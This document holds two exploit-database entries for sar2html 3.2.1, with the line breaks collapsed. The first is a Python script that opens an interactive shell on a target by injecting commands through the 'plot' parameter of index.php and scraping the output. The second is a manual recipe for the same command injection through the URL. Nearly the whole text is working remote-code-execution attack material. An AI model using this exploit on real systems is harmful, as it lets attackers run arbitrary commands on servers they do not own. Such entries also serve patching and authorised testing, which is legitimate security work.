# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution# Date: 27-12-2020# Exploit Author: Musyoka Ian# Vendor Homepage:https://github.com/cemtan/sar2html# Software Link: https://sourceforge.net/projects/sar2html/# Version: 3.2.1# Tested on: Ubuntu 18.04.1#!/usr/bin/env python3import requestsimport refrom cmd import Cmdurl = input("Enter The url => ")class Terminal(Cmd): prompt = "Command => " def default(self, args): exploiter(args)def exploiter(cmd): global url sess = requests.session() output = sess.get(f"{url}/index.php?plot=;{cmd}") try: out = re.findall("<option value=(.*?)>", output.text) except: print ("Error!!") for ouut in out: if "There is no defined host..." not in ouut: if "null selected" not in ouut: if "selected" not in ouut: print (ouut) print ()if __name__ == ("__main__"): terminal = Terminal() terminal.cmdloop()
# Exploit Title: sar2html Remote Code Execution# Date: 01/08/2019# Exploit Author: Furkan KAYAPINAR# Vendor Homepage:https://github.com/cemtan/sar2html# Software Link: https://sourceforge.net/projects/sar2html/# Version: 3.2.1# Tested on: Centos 7In web application you will see index.php?plot url extension.http://<ipaddr>/index.php?plot=;<command-here> will executethe command you entered. After command injection press "select # host" then your command'soutput will appear bottom side of the scroll screen.
